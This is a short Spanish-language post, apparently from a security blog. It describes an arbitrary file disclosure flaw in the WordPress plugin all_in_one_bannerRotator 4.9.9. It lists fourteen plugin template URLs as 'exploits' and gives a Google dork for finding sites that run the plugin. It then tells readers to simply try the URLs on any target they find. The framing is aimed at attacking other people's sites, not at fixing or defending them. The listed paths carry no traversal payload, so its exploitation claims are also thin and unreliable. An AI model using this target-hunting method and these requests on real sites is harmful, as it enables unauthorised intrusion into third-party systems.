WordPress all_in_one_bannerRotator Plugins 4.9.9
IMPACTO
WordPress all_in_one_bannerRotator Plugins 4.9.9 y otras versiones es propenso a la divulgación de un archivo arbitrario Vulnerabilidad porque no puede desinfectar correctamente la entrada proporcionada por el usuario.Un atacante puede aprovechar esta vulnerabilidad para ver archivos locales en el contexto del proceso del servidor web, Lo que puede ayudar en el lanzamiento de nuevos ataques.
Una exposición de información es la divulgación intencional o no intencional de información a un actor que no está explícitamente autorizado para tener acceso a esa información. El producto almacena información confidencial en archivos o directorios que son accesibles a actores fuera de la esfera de control pretendida.
El software utiliza una entrada externa para construir una ruta que pretende identificar un archivo o directorio que se encuentra debajo de un directorio padre restringido, pero el software no lo hace neutralice adecuadamente los elementos especiales dentro de la ruta que pueden causar la ruta para resolver en una ubicación que está fuera del directorio restringido.
EXPLOTACION
Para la expotacion de la vulnerabilidad utilizaremos a modo de exploits las siguientes URL:- /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php?page=all_in_one_bannerRotator_Manage_Banners
- /wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/banners.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/help.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Add_New
- /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Manage_Banners
- /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Help
- /wp-content/plugins/all_in_one_bannerRotator/tpl/playlist.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php?page=all_in_one_bannerRotator_Playlist
- /wp-content/plugins/all_in_one_bannerRotator/tpl/playlist_elements_over_image.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/preview.html
- /wp-content/plugins/all_in_one_bannerRotator/tpl/settings_form.php
POC
Para identificar un sitio vulnerable, que utilice el CMS de WordPress con el plugin "all_in_one_bannerRotator, utilizamos una busqueda avanzada en Google por medio de un dork.[🔎] inurl:"/wp-content/plugins/all_in_one_bannerRotator/"
La identificacion de objetivos posiblemente vulnerables
Una vez identificado algún sitio objetivo, solo debemos de probar los exploits anteriores.
0 Comentarios